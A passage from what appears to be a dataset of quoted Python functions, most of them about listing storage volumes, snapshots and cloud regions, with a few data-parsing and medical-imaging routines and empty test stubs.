range(blocks_partition[1]):\n for k in range(blocks_partition[2]):\n bl_corner = (block_shape[0] * i,\n block_shape[1] * j,\n block_shape[2] * k)\n tr_corner = (block_shape[0] * (i+1),\n block_shape[1] * (j+1),\n block_shape[2] * (k+1)) \n index = _3d_to_numeric_pos((i, j, k), blocks_partition, order='F')\n d[index] = Volume(index, bl_corner, tr_corner)\n logger.debug(\"Indices of names volumes found: %s\", d.keys())\n logger.debug(\"End\\n\")\n return d", "def test_aws_service_api_volumes_get(self):\n pass", "def get_list(self, regions = None):\r\n \r\n data = []\r\n if regions is None:\r\n regions = ['PHA','STC','JHC','PLK','KVK','ULK','LBK','HKK','PAK','OLK','MSK','JHM','ZLK','VYS']\r\n for region in regions:\r\n cache_file = os.path.join(self.__folder, self.__cache.format(region))\r\n if region in self.__stored_data.keys():\r\n data.append(self.__stored_data[region])\r\n elif os.path.isfile(cache_file):\r\n with gzip.open(cache_file, \"rb\") as file_data:\r\n self.__stored_data[region] = pickle.load(file_data)\r\n data.append(self.__stored_data[region])\r\n else:\r\n parsed_data = 
self.parse_region_data(region)\r\n with gzip.open(cache_file, \"wb\") as file_data:\r\n pickle.dump(parsed_data, file_data, protocol=-1)\r\n self.__stored_data[region] = parsed_data\r\n data.append(parsed_data)\r\n concatenated_data = []\r\n for j in range(65):\r\n concatenated_data.append(np.concatenate([data[i][1][j] for i in range(len(data))]))\r\n return (data[0][0], concatenated_data)", "def get_device_map():\n ret = []\n vlist = subprocess.check_output(['ceph-volume', 'lvm', 'list',\n '--format=json'])\n for osd_id, data in json.loads(vlist.decode('utf8')).items():\n osd_id = normalize_osd_id(osd_id)\n for elem in data:\n for device in elem['devices']:\n ret.append({'id': osd_id, 'path': device})\n return ret", "def volumes(self) -> Sequence['outputs.GetVolumeGroupSapHanaVolumeResult']:\n return pulumi.get(self, \"volumes\")", "def volume(self):\n return [node.volume for node in self]", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def volumes(self) -> Optional[Sequence['_core.v1.outputs.Volume']]:\n return pulumi.get(self, \"volumes\")", "def _get_volumes_from_id(volume_id):\n\n volumes = _get_volumes(list_of_volume_ids=volume_id)\n\n return volumes[0] if volumes else volumes", "def test_volumes_get(self):\n pass", "def test_aws_service_api_volume_types_get(self):\n pass", "def volume(self):\n return {'lvad': self._v}", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def get_regions(locale):\n\n def json_file(name):\n return os.path.join(json_dir, 'regions', '%s.json' % name)\n\n filepath = json_file(locale)\n\n if not os.path.exists(filepath):\n filepath = json_file('en-US')\n if not os.path.exists(filepath):\n raise Exception('Unable to load region data')\n\n with codecs.open(filepath, encoding='utf8') as fd:\n return json.load(fd)", "def get_replication_status(response_json):\r\n paired_vols = {}\r\n for volume in response_json['result']['volumes']:\r\n vol_id = volume['volumeID']\r\n vol_name = volume['name']\r\n paired_vols[vol_id] = vol_name\r\n return paired_vols", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def get_region(self, region):\n\n return self.adapter.get_region(region) \n\n\n\n\n #file_compression = \"\"\n # magic_dict = {\n # b\"\\x1f\\x8b\\x08\": \"gz\",\n # b\"\\x42\\x5a\\x68\": \"bz2\",\n # b\"\\x50\\x4b\\x03\\x04\": \"zip\"\n # }\n # \n\n # max_len = max(len(x) for x in magic_dict)\n # with open(file_path, \"rb\") as f:\n # file_start = f.read(max_len)\n # for magic, filetype in magic_dict.items():\n # if file_start.startswith(magic):\n # file_compression = filetype\n # split_ext = file_path.split(\".\")\n # extension = split_ext[len(split_ext) -1]\n # if(file_compression == \"zip\"):\n # if extension != \"zip\":\n # subprocess.call(\"mv {} 
{}.zip\".format(file_path, file_path).split())\n # subprocess.call(\"unzip {} -d .\".format(file_path).split())\n # if(file_compression == \"bz2\"):\n # if extension != \"bz2\":\n # subprocess.call(\"mv {} {}.bz2\".format(file_path,file_path).split())\n # subprocess.call(\"bzip2 -df {}\".format(file_path).split())\n # if(file_compression == \"gz\"):\n # if extension != \"gz\":\n # subprocess.call(\"mv {} {}.gz\".format(file_path,file_path).split())\n # subprocess.call(\"gzip -df {}\".format(file_path).split())", "def volumes(self) -> Optional[Sequence['_core.v1.outputs.VolumePatch']]:\n return pulumi.get(self, \"volumes\")", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", \"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_volume_parameters(volumes):\n volume_parameters = dict()\n for v in volumes:\n if v['type'] == 'pv':\n # FIXME: How should we handle existing PVs?\n continue\n\n if v['type'] == 'pvc':\n mount_point = v['mount_point'].replace('/', '_').strip('_')\n par_name = \"vol_{}\".format(mount_point)\n volume_parameters[par_name] = ('str', v['name'])\n elif v['type'] == 'new_pvc':\n rok_url = v['annotations'].get(\"rok/origin\")\n if rok_url is not None:\n par_name = \"rok_{}_url\".format(v['name'].replace('-', '_'))\n volume_parameters[par_name] = ('str', rok_url)\n else:\n raise ValueError(\"Unknown volume type: {}\".format(v['type']))\n return volume_parameters", "def volumes(interval,symbol):\n\ttoday = datetime.utcnow()\n\tcurrent_time = today.time()\n\tdaily_start_time = dtime(3,45)\n\tdaily_end_time = dtime(10,15)\n\tvolume_indicator = {} \n\tstart_timestamp = 0\n\tend_timestamp = 0\n\tif current_time < daily_start_time:\n\t\tyesterday = today - timedelta(days=1)\n\t\tstart_timestamp = time.mktime(datetime(yesterday.year,yesterday.month,yesterday.day,\n\t\t\t\t\t\t\t\t\t\t\t\t\t9,15,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tend_timestamp = time.mktime(datetime(yesterday.year,yesterday.month,yesterday.day,\n\t\t\t\t\t\t\t\t\t\t\t\t\t15,45,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n\n\telif current_time > daily_end_time:\n\t\tstart_timestamp = time.mktime(datetime(today.year,today.month,today.day,9,15,0,0,\n\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tend_timestamp = time.mktime(datetime(today.year,today.month,today.day,15,45,0,0,\n\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n\n\telse:\n\n\t\tstart_timestamp = time.mktime(datetime(today.year,today.month,today.day,9,15,0,0,\n\t\t\t\t\t\t\t\t\t\t\ttzinfo=pytz.UTC).timetuple())\n\t\tcurrent_time = datetime.now()\n\t\tend_timestamp = 
time.mktime(datetime(today.year,today.month,today.day,current_time.hour,\n\t\t\t\t\t\t\t\t\t\t\t\tcurrent_time.minute,0,0,tzinfo=pytz.UTC).timetuple())\n\t\tintervals = Interval.get_intervals(start_timestamp,end_timestamp,interval)\n\t\tdata = Data.get_data(symbol)\n\t\tvolume_indicator = Volume.get_volume_indications(intervals,data)\n volume_indicator['symbol']=symbol\n\treturn json.dumps(volume_indicator,sort_keys=True,indent=4,separators=(',',': '))", "def ft_volumeslice( slice_name ):\n print \"slice: %s\" % slice_name\n \n volumes = get_volumeslice_volume_names( slice_name )\n \n print \"volumes mounted in slice %s:\" % slice_name\n for v in volumes:\n print \" %s:\" % v\n \n vs = get_volumeslice( v, slice_name )\n \n print \" %s\" % dir(vs)", "def get_volumeslice_volume_names( slice_name ):\n try:\n all_vs = models.VolumeSlice.objects.filter( slice_id__name = slice_name )\n volume_names = []\n for vs in all_vs:\n volume_names.append( vs.volume_id.name )\n \n return volume_names\n except Exception, e:\n logger.exception(e)\n logger.error(\"Failed to query datastore for volumes mounted in %s\" % slice_name)\n return None", "def get_complete_volume_info(vol_name, vol_info_dict=None):\n return_dict = {}\n try:\n if not vol_info_dict:\n vol_info_dict, err = get_basic_volume_info(vol_name)\n if err:\n raise Exception(err)\n\n return_dict = vol_info_dict\n\n vol_status_dict = {}\n if vol_info_dict['status'] == 1:\n vol_status_dict, err = get_volume_status(\n vol_info_dict['name'], vol_info_dict)\n if err:\n raise Exception(err)\n\n if vol_info_dict['status'] == 1:\n if vol_status_dict:\n # Add the status and usage info\n return_dict.update(vol_status_dict)\n vol_process_dict, err = get_volume_process_status(\n vol_name, vol_info_dict, vol_status_dict)\n if err:\n raise Exception(err)\n\n return_dict['processes_ok'] = vol_process_dict['processes_ok']\n\n for br in return_dict['brick_status']:\n if br in vol_process_dict['brick_status']:\n return_dict['brick_status'][br].update(\n vol_process_dict['brick_status'][br])\n\n quotas, err = get_volume_quota(vol_name, vol_info_dict)\n if err:\n raise Exception(err)\n return_dict['quotas'] = quotas\n\n except Exception, e:\n return None, 'Error getting complete volume information : %s' % str(e)\n else:\n return return_dict, None", "def getInstancesD(region):\n instances = getInstances(region)\n instancesDicts = {\"id\": i.id,\n \"KEEP-tag\": getKeepTag(i),\n \"instance_type\": i.instance_type,\n \"state\": i.state,\n \"launch_time\": i.launch_time,\n \"security_groups\": getGroups(i),\n \"region\": i.region.name,\n \"PROD\": isProduction(i)\n }", "def parse_region_data(self, region):\r\n \r\n self.download_data()\r\n region_filename = self.__get_region_filename(region)\r\n list_str = [\"region\", \"p1\", \"p36\", \"p37\", \"p2a\", \"weekday(p2a)\", \"p2b\", \"p6\", \"p7\", \"p8\", \"p9\", \"p10\", \r\n \"p11\", \"p12\", \"p13a\", \"p13b\", \"p13c\", \"p14\", \"p15\", \"p16\", \"p17\", \"p18\",\"p19\", \"p20\", \"p21\", \r\n \"p22\", \"p23\", \"p24\", \"p27\", \"p28\", \"p34\", \"p35\", \"p39\", \"p44\", \"p45a\", \"p47\", \"p48a\", \"p49\", \r\n \"p50a\", \"p50b\", \"p51\", \"p52\", \"p53\", \"p55a\", \"p57\", \"p58\", \"a\", \"b\", \"d\", \"e\", \"f\", \"g\", \"h\", \r\n \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"p5a\"]\r\n \r\n row_count = self.__get_files_row_count(region)\r\n list_arrays = [np.zeros(row_count, dtype=dt) for dt in self.__types]\r\n row_index = 0\r\n for file in self.__files:\r\n 
file_to_parse = os.path.join(self.__folder, os.path.basename(file))\r\n with zipfile.ZipFile(file_to_parse, \"r\") as zf:\r\n with zf.open(region_filename, 'r') as csv_file:\r\n reader = csv.reader(TextIOWrapper(csv_file, 'windows-1250'), delimiter=';', quotechar='\"')\r\n for row in reader:\r\n list_arrays[0][row_index] = region\r\n for col_index, col in enumerate(row):\r\n try:\r\n list_arrays[col_index + 1][row_index] = col\r\n except ValueError:\r\n if list_arrays[col_index + 1][row_index].dtype == np.int64:\r\n list_arrays[col_index + 1][row_index] = -1\r\n elif list_arrays[col_index + 1][row_index].dtype == 'datetime64[D]':\r\n print('Error2:', col)\r\n elif list_arrays[col_index + 1][row_index].dtype == np.float64:\r\n if type(col) != str:\r\n list_arrays[col_index + 1][row_index] = col.replace(',', '.')\r\n else:\r\n list_arrays[col_index + 1][row_index] = float(\"nan\")\r\n row_index += 1\r\n \r\n return (list_str, list_arrays)", "def get_lvs() -> List[Dict[str, str]]:\n p = subprocess.run(\n [\"lvs\", \"--reportformat\", \"json\"], check=True, capture_output=True\n )\n output = json.loads(p.stdout)\n result = []\n for lv in output[\"report\"][0][\"lv\"]:\n lvname = lv[\"lv_name\"]\n vgname = lv[\"vg_name\"]\n devname = f\"{vgname}-{lvname}\"\n path = f\"/dev/mapper/{devname}\"\n result.append({\"lv\": lvname, \"vg\": vgname, \"devname\": devname, \"devpath\": path})\n return result", "def variant_sample_list_2_3():\n return {\n \"schema_version\": \"2\",\n \"status\": \"current\",\n \"project\": \"12a92962-8265-4fc0-b2f8-cf14f05db58b\",\n \"institution\": \"828cd4fe-ebb0-4b36-a94a-d2e3a36cc989\",\n \"variant_samples\": [\n {\n \"selected_by\": \"834559db-a3f6-462c-81a4-f5d7e5e65707\",\n \"date_selected\": \"2021-07-09T16:42:23.694711+00:00\",\n \"variant_sample_item\": \"013bcc47-3885-4682-99c2-800b95765524\",\n \"filter_blocks_used\": {\n \"filter_blocks\": [\n {\n \"name\": \"Breast Cancer\",\n \"query\": \"associated_genotype_labels.proband_genotype_label=Heterozygous&associated_genelists=Breast+Cancer+%2828%29&variant.genes.genes_most_severe_consequence.impact=MODERATE&variant.genes.genes_most_severe_consequence.impact=HIGH\"\n }\n ],\n \"intersect_selected_blocks\": False\n }\n },\n {\n \"selected_by\": \"834559db-a3f6-462c-81a4-f5d7e5e65707\",\n \"date_selected\": \"2021-07-09T16:42:23.696554+00:00\",\n \"variant_sample_item\": \"ac62850f-6f77-4d3b-9644-41699238d0e2\",\n \"filter_blocks_request_at_time_of_selection\": \"some-gibberish\"\n }\n ],\n \"created_for_case\": \"GAPCAJQ1L99X\",\n \"uuid\": \"292250e7-5cb7-4543-85b2-80cd318287b2\"\n }", "def get_volume_info(self, uid):\n LOG.debug(\"Entering\")\n cmd = \"svcinfo lsvdisk -bytes -filtervalue vdisk_UID=%s -delim :\" % uid\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n raise SVCVolumeNotFound(\n _(\"Couldn't find volume information for UID %s\") % uid)\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_KEY_VDISK_ID)\n diskId = values[index]\n index = header.index(SVC_KEY_VDISK_NAME)\n name = values[index]\n index = header.index(SVC_KEY_VOLUME_GROUP)\n volumeGroup = values[index]\n index = header.index(SVC_KEY_VDISK_CAPACITY)\n capacity = values[index]\n\n info = {SVC_KEY_VDISK_ID: diskId,\n SVC_KEY_VDISK_NAME: name,\n SVC_KEY_VOLUME_GROUP: volumeGroup,\n SVC_KEY_VDISK_CAPACITY: capacity}\n\n LOG.debug(\"Exiting\")\n return info", "def getDataBaseLists(data, db):\n # The list of regions - ex: \"46 60 26 23\" for region of coordinates 46.60 26.23\n regions = []\n 
# The list of lists of records - each region can have multiple records\n records = []\n try:\n # Loop through all data in database dictionary\n for reg, rec in data:\n # Store the region name in list\n regions.append(reg)\n # Create a new list for the current region to store its records\n rec_list = []\n # Loop through records dictionary to get records name and data\n for rec_name, rec_data in rec.items():\n try:\n # Store all records for the current region as Record object\n rec_list.append(Record(rec_name, Data(rec_data)))\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # Something was wrong with the current record - delete it from database\n db.child(Constants.data_path).child(reg).child(rec_name).remove()\n return None, None\n # Store the records list of the current region in the list\n records.append(rec_list)\n return regions, records\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # There was some invalid data in database\n print(Texts.invalid_database_data)\n return None, None", "def describe_volumes(InstanceId=None, StackId=None, RaidArrayId=None, VolumeIds=None):\n pass", "def get_volumes_metadata(cls, cluster):\n def _get_volumes_ids(instance):\n return [v['id']\n for v in instance.volumes_metadata.get('volumes', [])]\n\n volumes_metadata = {\n 'volumes': [],\n 'volumes_roles_mapping': {},\n 'rule_to_pick_boot_disk': [],\n }\n\n cluster_volumes_ids = _get_volumes_ids(cluster)\n release_volumes_ids = _get_volumes_ids(cluster.release)\n processed_volumes = {}\n\n enabled_plugins = ClusterPlugin.get_enabled(cluster.id)\n for plugin_adapter in map(wrap_plugin, enabled_plugins):\n metadata = plugin_adapter.volumes_metadata\n\n for volume in metadata.get('volumes', []):\n volume_id = volume['id']\n for owner, volumes_ids in (('cluster', cluster_volumes_ids),\n ('release', release_volumes_ids)):\n if volume_id in volumes_ids:\n raise errors.AlreadyExists(\n 'Plugin {0} is overlapping with {1} '\n 'by introducing the same volume with '\n 'id \"{2}\"'.format(plugin_adapter.full_name,\n owner,\n volume_id)\n )\n elif volume_id in processed_volumes:\n raise errors.AlreadyExists(\n 'Plugin {0} is overlapping with plugin {1} '\n 'by introducing the same volume with '\n 'id \"{2}\"'.format(\n plugin_adapter.full_name,\n processed_volumes[volume_id],\n volume_id\n )\n )\n\n processed_volumes[volume_id] = plugin_adapter.full_name\n\n volumes_metadata.get('volumes_roles_mapping', {}).update(\n metadata.get('volumes_roles_mapping', {}))\n volumes_metadata.get('volumes', []).extend(\n metadata.get('volumes', []))\n volumes_metadata.get('rule_to_pick_boot_disk', []).extend(\n metadata.get('rule_to_pick_boot_disk', []))\n\n return volumes_metadata", "def volume_curves(self):\n for key in self._volume_curves:\n yield key, self._data[key]", "def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"volumes\")", "def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"volumes\")", "def reservations(self):\r\n reservations = dict()\r\n for key in self._mounts.keys():\r\n reservations.update(self._mounts[key]['reservations'])\r\n return reservations", "def get_volumes(patient, pet_folder, struct_folders, number, volumes, plot_data=False):\n print(\"--------------------------------------------------------------------------------------\")\n print(\"Patient {:02d}: {}\".format(number, patient))\n # get all dicom image's paths\n 
dicom_images = [pet_folder+\"/\"+f for f in os.listdir(pet_folder) if f.lower().endswith(\".dcm\")]\n dicom_images.sort()\n # get information from dicom header\n dicom_info = dicom.read_file(dicom_images[0])\n pixel_shape = (int(dicom_info.Rows), int(dicom_info.Columns), int(dicom_info.NumberOfSlices))\n pixel_spacing = (float(dicom_info.PixelSpacing[0]), float(dicom_info.PixelSpacing[1]),\n float(dicom_info.SliceThickness))\n print(\" Pixel spacing: {}\".format(pixel_spacing))\n # create 3D array for pet image\n pet_image = np.zeros(pixel_shape, dtype=dicom_info.pixel_array.dtype)\n for i, dicom_img in enumerate(dicom_images):\n ds = dicom.read_file(dicom_img)\n pet_image[:, :, i] = ds.pixel_array\n # create contours structure\n mtv_variables = []\n for struct_folder in struct_folders:\n # extract contours labels and index from lvol.txt\n lvoltxt_file = struct_folder + \"/lvol.txt\"\n with open(lvoltxt_file) as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n if (\"mtv\" in line.lower() and (\"cervix\" in line.lower() or \"tumor\" in line.lower()) and\n \"nodal\" not in line.lower() and \"nodes\" not in line.lower() and\n \"ring\" not in line.lower() and \"opt\" not in line.lower()):\n struct = line.strip().split(\"|\")\n mtv_variables.append((int(struct[0]), struct[-1], struct_folder))\n # return nothing if no mtv contours were found\n if len(mtv_variables) == 0:\n return [], volumes, []\n # add contours to original image and plot it\n prev_folder = None\n patient_volumes = [pet_image]\n print(\" Possible MTV contours:\")\n for mtv_idx, mtv_label, mtv_folder in mtv_variables:\n # read and transform data from nii file\n if prev_folder != mtv_folder:\n # only read mtv_folder if it has changed\n nii_obj = nib.load(mtv_folder + \"/lvol.nii\")\n nii_data = nii_obj.get_data()\n volume = np.zeros(nii_data.shape[:3], dtype=int)\n for i in range(nii_data.shape[-1]):\n volume += nii_data[:, :, :, 0, i] << (8 * i)\n volume = np.swapaxes(volume, 0, 1)\n volume = np.flip(volume, 2)\n print(\" * Structures folder: {}\".format(mtv_folder.split(\"/\")[-1]))\n print(\" MTV_index:\", mtv_idx)\n print(\" MTV_label:\", mtv_label.split(\"/\")[-1])\n prev_folder = mtv_folder\n # create 3D matrix with 1s where ROI is and 0s everwhere else\n try:\n tumor_volume = (np.bitwise_and(volume, 2 ** mtv_idx) > 0) * 1\n except TypeError:\n print(\"Error while reading volume for index: {}, label: {}!\".format(mtv_idx,\n mtv_label))\n patient_volumes.append(())\n continue\n # find bounding box for volume\n mask_range = [[pixel_shape[0], pixel_shape[1], pixel_shape[2]], [-1, -1, -1]]\n tumor_exists = False\n for xx in range(pixel_shape[0]):\n for yy in range(pixel_shape[1]):\n for zz in range(pixel_shape[2]):\n if tumor_volume[xx, yy, zz]:\n tumor_exists = True\n mask_range[0][0] = min(mask_range[0][0], xx)\n mask_range[0][1] = min(mask_range[0][1], yy)\n mask_range[0][2] = min(mask_range[0][2], zz)\n mask_range[1][0] = max(mask_range[1][0], xx)\n mask_range[1][1] = max(mask_range[1][1], yy)\n mask_range[1][2] = max(mask_range[1][2], zz)\n # continue if the mask is all 0s\n if not tumor_exists:\n print(\"Volume not found for index: {}, label: {}!\".format(mtv_idx, mtv_label))\n patient_volumes.append(())\n continue\n # Get ROI\n current_volume = pet_image[mask_range[0][0]:mask_range[1][0]+1,\n mask_range[0][1]:mask_range[1][1]+1,\n mask_range[0][2]:mask_range[1][2]+1]\n current_mask = tumor_volume[mask_range[0][0]:mask_range[1][0]+1,\n mask_range[0][1]:mask_range[1][1]+1,\n 
mask_range[0][2]:mask_range[1][2]+1]\n # Add volumes to patient_volumes\n patient_volumes.append((current_mask, mtv_label, mask_range, mtv_folder))\n # Plot volumes\n if plot_data:\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=0, fig_num=0,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=1, fig_num=1,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n plot_pet_medians(pet_image, pixel_spacing, mask=tumor_volume, median=2, fig_num=2,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n input(\"press ENTER to continue... \")\n plot_pet_volume(current_volume, pixel_shape, pixel_spacing, mask=current_mask,\n patient=patient, mask_name=mtv_label.split(\"/\")[-1])\n volumes[patient] = patient_volumes\n return mtv_variables, volumes, pixel_spacing", "def test_aws_service_api_volume_get(self):\n pass", "def get_basic_volume_info_all():\n vl = None\n try:\n d, err = xml_parse.run_gluster_command(\n '/usr/sbin/gluster volume info all --xml')\n if err:\n raise Exception(err)\n\n root = d[\"root\"]\n\n # Get the admin vol name so it can be excluded from the list\n admin_vol_name, err = config.get_admin_vol_name()\n if err:\n raise Exception(err)\n\n # Now get the all the volume info for user created volumes\n vl, err = xml_parse.get_volume_info(root, admin_vol_name)\n if err:\n raise Exception(err)\n except Exception, e:\n return None, 'Error getting basic volume information for all volumes : %s' % str(e)\n else:\n return vl, None", "def volumes(self) -> Iterable[dto.Volume]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def get_all_variants():\n # reads the session\n session = request.args.get('session', type=str)\n # reads the requested process name\n process = request.args.get('process', default='receipt', type=str)\n\n dictio = {}\n\n if check_session_validity(session):\n user = get_user_from_session(session)\n if lh.check_user_log_visibility(user, process):\n variants = lh.get_handler_for_process_and_session(process, session).get_variant_statistics()\n dictio = {\"variants\": variants}\n\n ret = jsonify(dictio)\n\n return ret", "def getVolumes(self, df: str = None, ts: str = None, cursor: str = None, pageSize: int = None):\n params = {\n 'df': df,\n 'ts': ts,\n 'cursor': cursor,\n 'pageSize': pageSize\n }\n return self.api_get_request(f'{self.NINJA_API_QUERIES_VOLUMES}', params=params)", "def regions_json(self, filename):\n with open(filename) as f:\n return json.load(f)", "def get_volume_list(self, name_or_ip=\"\" , part=\"\", noresolve=False, _cfg=None) :\n command_list = [_cfg.binaries[\"vos\"],\"listvldb\", \"-cell\",\"%s\" % _cfg.cell ]\n if name_or_ip != \"\" :\n command_list += [ \"-server\", \"%s\" % name_or_ip ] \n if part != \"\" :\n command_list += [\"-part\", \"%s\" % part]\n if noresolve :\n command_list.append(\"-noresolve\")\n return command_list, PM.get_volume_list", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def fusion_api_get_storage_volumes_template(self, uri=None, param='', api=None, headers=None):\n return self.template.get(uri=uri, api=api, 
headers=headers, param=param)", "def getRegions(self, polygon: Polygon, epsg: int) -> list:\n self.output_epsg = epsg\n polygon_df = gpd.GeoDataFrame([polygon], columns=['geometry'])\n\n polygon_df.set_crs(epsg=self.output_epsg, inplace=True)\n polygon_df['geometry'] = polygon_df['geometry'].to_crs(epsg=self.input_epsg)\n minx, miny, maxx, maxy = polygon_df['geometry'][0].bounds\n\n cond_xmin = self.metadata.xmin <= minx\n cond_xmax = self.metadata.xmax >= maxx\n cond_ymin = self.metadata.ymin <= miny\n cond_ymax = self.metadata.ymax >= maxy\n\n df = self.metadata[cond_xmin & cond_xmax & cond_ymin & cond_ymax]\n sort_df = df.sort_values(by=['year'])\n regions = sort_df['filename'].to_list()\n return regions", "def get_region_data(region):\n cursor = reg_data_coll.find({REGION_KEY: region})\n df = pd.DataFrame(list(cursor))\n if df.empty:\n app.logger.error(f\"While getting {region} data: no data\")\n return df", "def read_regions(namefile):\n db = shelve.open(namefile)\n key_firms = db['nif']\n regions = db['regions']\n methodvalues = db['methodvalues']\n db.close()\n return key_firms, regions, methodvalues", "def load_snapshot(base_path, snap_num, subvolumes, group, fields, matches):\n n_init = []\n\n snap_key = 'N{}_ThisFile_Redshift'.format('groups' if group == 'Haloprop' else 'subgroups')\n for subvolume in subvolumes: \n n_init.append(load_header(base_path, subvolume)[snap_key][snap_num])\n \n # initialize objects structure\n result = {}\n \n with h5py.File(file_path(base_path, subvolumes[0], 'subvolume'), 'r') as f:\n # galprop and haloprop both have a redshift quantity so we can use that to query for the snapshot we want\n filter_field = '{}Redshift'.format(group)\n \n if not fields:\n fields = list(f[group].keys())\n\n # make sure the redshift field is included in fields\n if filter_field not in fields:\n fields.append(filter_field) \n \n for field in fields:\n if field not in f[group].keys():\n raise Exception(\"Catalog does not have requested field [{}]!\".format(field))\n\n shape = list(f[group][field].shape)\n shape[0] = np.sum(n_init)\n\n # allocate within return dict\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n if matches:\n with h5py.File(file_path(base_path, subvolumes[0], 'matches'), 'r') as f:\n for field in f[group].keys():\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n header = load_header(base_path, subvolumes[0])\n filter_condition = header['Redshifts'][snap_num]\n\n offset = 0\n\n for subvolume in subvolumes:\n subvol_result = load_subvolume(base_path, subvolume, group, fields, matches, False)\n\n idx = subvol_result[filter_field][:] == filter_condition\n\n for field in subvol_result.keys():\n if len(subvol_result[field].shape) != 1:\n result[field][offset:offset+n_init[0], :] = subvol_result[field][idx]\n else:\n result[field][offset:offset+n_init[0]] = subvol_result[field][idx]\n\n offset += n_init[0]\n del n_init[0]\n \n return result", "def get_vgs() -> List[str]:\n p = subprocess.run(\n [\"vgs\", \"--reportformat\", \"json\"], check=True, capture_output=True\n )\n output = json.loads(p.stdout)\n return [vg[\"vg_name\"] for vg in output[\"report\"][0][\"vg\"]]", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError 
getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def getStorageVolumeData(self,node,storage,volume):\n data = self.connect('get','nodes/%s/storage/%s/content/%s' % (node,storage,volume),None)\n return data", "def get_regions_in_partition(self, prefix=None, delimiter='/'):\n if prefix is None:\n prefix = self.s3_path\n else:\n prefix = self._strip_slashes(prefix)\n\n query_params = {\n 'Bucket': self.s3_bucket,\n 'Prefix': prefix + '/',\n 'Delimiter': delimiter\n }\n\n # We currently should be able to get all regions in a single request\n # TODO: Fail if we get a next token - there's more to this prefix than meets the eye\n region_list = []\n response = self.s3_client.list_objects_v2(**query_params)\n for c_prefix in response.get('CommonPrefixes', []):\n region = self._extract_region_from_prefix(c_prefix)\n if region:\n region_list.append(region)\n\n return region_list", "def split_copies(region, vl):\n # Sniff out the ploidy\n if len(vl) == 0:\n logger.warning('Empty region ({}), assuming diploid'.format(region))\n ploidy = 2\n else:\n ploidy = len(vl[0].samples[0]['GT'])\n logger.debug('Region: {}, ploidy: {}'.format(region, ploidy))\n\n # cpy_l = [\n # (cpy, '|'.join(['0'] * cpy + ['1'] + ['0'] * (ploidy - 1 - cpy)))\n # for cpy in range(ploidy)\n # ]\n #\n # return {\n # 'region': region,\n # 'v': dict(\n # [\n # (gt, list(filter(None, (parse(v, cpy=cpy) for v in vl))))\n # for cpy, gt in cpy_l\n # ]\n # )\n # }\n\n return {\n 'region': region,\n 'v': [\n list(filter(None, (parse(v, cpy=cpy) for v in vl)))\n for cpy in range(ploidy)\n ]\n }", "def 